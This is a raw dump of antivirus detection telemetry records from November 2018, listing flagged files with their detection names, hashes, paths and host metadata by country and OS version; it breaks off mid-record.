  Row(detection=Row(filename='52adf30e-d3a5-bcb6-df9a-36e3bfd3c453.exe', filepath='F:\\{52eb0ca8-72da-d7c4-0d0c-e693f32f9964}\\52adf30e-d3a5-bcb6-df9a-36e3bfd3c453.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-01T09:32:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-072204-37c19d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-072148-354EDC1B\\AVSCAN-20181102-072204-37C19D94', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T23:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151357-15a960f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46186eb8\\AVSCAN-20181101-151343-12FAAA3D\\AVSCAN-20181101-151357-15A960F7', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:14:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T22:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003311-7e13bc1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003311-7E13BC1A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T16:20:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vcredist_x64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x64.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='5741a738e203397947f6519bda85271e18dab035aaef1750bcca6a7fd9eb93d7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0a18fcfb7b356e196a81928730d5bef13ab94493b32d1d7b9b4a4b65b2be8204.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0A18FCFB7B356E196A81928730D5BEF13AB94493B32D1D7B9B4A4B65B2BE8204.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a18fcfb7b356e196a81928730d5bef13ab94493b32d1d7b9b4a4b65b2be8204', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:13:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\A\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\A\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:12:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T16:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.395\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.395\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:11:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0001421.exe', filepath='G:\\System Volume Information\\_restore{E470856B-19CD-4E68-8CA1-030799D413D1}\\RP4\\A0001421.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='6a1c5b8551b18c9e6f18a2921feef85c8b1e09009464f471554e0f19994cb5e2', metadata=Row(cmdline='-Embedding', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Citrix\\ICA Client\\wfcrun32.exe', parentsize=1177912, timestamp='2018-11-01T12:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182504-879f94cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_34740129\\AVSCAN-20181101-182407-825CA1B0\\AVSCAN-20181101-182504-879F94CC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:25:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001208-ab0ffe61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-001208-AB0FFE61', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\PROGRAM FILES\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\BTOJ6LCC\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline='\\\\\\/monitor', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T10:59:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093858-bf858e09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093858-BF858E09', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145956-8bb1c144', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145956-8BB1C144', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='626610.scr', filepath='C:\\Users\\X\\Documents\\Steam\\CODEX\\626610\\626610.scr', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spid.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SPID.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150237-aa8196ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150237-AA8196ED', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cache.exe', filepath='F:\\Android\\data\\com.samsung.android.app.simplesharing\\cache\\cache.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:42:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\4ixod3iqexo\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bein tvv.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bein tvv.exe', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\bein tvv.exe', parentsize=768000, timestamp='2018-11-01T11:06:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rcgonbk', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RCGONBK', filesize=64000, name='VBA/Dldr.Agent.qydjt.#M1.#R1'), hash='ae4ceb7a94761bad0147d3e5e790ecaeb29c6c5dcac76fba6c7afa1534b39fa2', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190327-dfed4664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190327-DFED4664', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094210-e46b97e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094210-E46B97E1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:42:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180450-800c3266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77784142\\AVSCAN-20181101-180417-7C2FEC2D\\AVSCAN-20181101-180450-800C3266', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152735-c9811f61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152735-C9811F61', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\dtzk5w2zw3n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151052-0957df66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151052-0957DF66', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89_bd613be2.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89_bd613be2.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3227.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3227.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cudsgaky.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CUDsGaKY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_19473900.vir', filepath='\\\\?\\C:\\Applications\\Service_19473900.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085247-89f8b01c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07a35490\\AVSCAN-20181101-085203-81AAB4DA\\AVSCAN-20181101-085247-89F8B01C', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:52:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T18:36:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091427-1f7e9043', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d751c4a\\AVSCAN-20181101-091410-1CD67B03\\AVSCAN-20181101-091427-1F7E9043', filesize=448000, name='PUA/BitcoinMiner.#M1.#R1'), hash='e27e5ced296898518d1afea14f01e1c470cd013dd13534f48e1c1e5b0fdd7ef0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-162946-ddf96606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1bd4147a\\AVSCAN-20181104-162844-D6D8B37B\\AVSCAN-20181104-162946-DDF96606', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-181237-8ab25899', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6bd77c48\\AVSCAN-20181103-181214-87C0F2CD\\AVSCAN-20181103-181237-8AB25899', filesize=852000, name='TR/Crypt.XPACK.Gen.#M300.#R471'), hash='1a59ca13c65517a7f07e3d05c6b810d7b62ab2231708273e90c83f1fe710547b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130809-0937837f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130809-0937837F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:28:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iiwusqomkv.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\iiwusqomkV.exe', filesize=85584000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='8bc154916474de9fcf7b18d62ec08a73e7d5c869bc477c4063d85171d3967601', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T18:53:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='7a0dcdb58d4e5bbf303af3c6c5f9063ecfeb2e404d5797577234cd26d8be0b56', metadata=Row(cmdline=None, country='NI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Movies Toolbar\\Datamngr\\DatamngrCoordinator.exe', parentsize=3545088, timestamp='2018-11-04T22:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7fab5d6462b6772b9d0189a304fe1dfeba2e0574925c1ab6a57bfd122fcbdfed', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T03:20:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225406-05f86347', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201403-72C9CBBB\\AVSCAN-20181104-225406-05F86347', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:54:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autoit3.exe', filepath='D:\\اسلاميات\\Skypee\\AutoIt3.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='6a85ffd5b6373b3ba246e408872b7007d0904cf2023a6e5cbeb9b324ea0f2198', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\Ground.exe', parentsize=562176, timestamp='2018-11-04T18:26:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-002037-a0f74a9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-002037-A0F74A9C', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:50:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe173_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe173 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, 